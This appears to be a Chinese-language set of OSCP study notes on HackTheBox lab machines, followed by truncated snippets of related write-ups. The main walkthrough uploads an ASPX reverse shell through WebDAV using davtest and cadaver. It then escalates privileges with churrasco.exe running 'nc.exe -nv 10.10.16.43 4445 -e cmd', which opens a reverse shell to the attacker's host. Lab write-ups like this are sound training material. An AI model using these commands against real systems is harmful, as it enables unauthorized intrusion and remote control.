nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.188 (扫描TCP)
发现有webdav可以利用
davtest -url http://10.10.16.43 ----可以查看到哪些后缀可以进行上传
cadaver http://10.10.16.43
put reverse_shell.txt
move reverse_shell.txt reverse_shell.aspx
然后上传反弹SHELL挡案
然后提权systeminfo
C:\Inetpub\wwwroot\churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe -nv 10.10.16.43 4445 -e cmd"
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.122 (扫描TCP)我们普通的tcp啥都没有,所以考虑udp扫描当然也有可能是...
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.14.190 (扫描TCP)nmap -sU --top-ports 100 ...
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.237.97 (扫描TCP)enum4linux(自动化枚举) ...
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)使用ftp进行连接ftp 10.129.254.198 2...
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.199 (扫描TCP)nmap -sU --top-ports 100 ...
OSCP备考_0x51_HackThBox靶机_Windows_ServMon10.129.227.77nmap -sCV -p- --min-rate 10000 -T4 -sS 10.1...
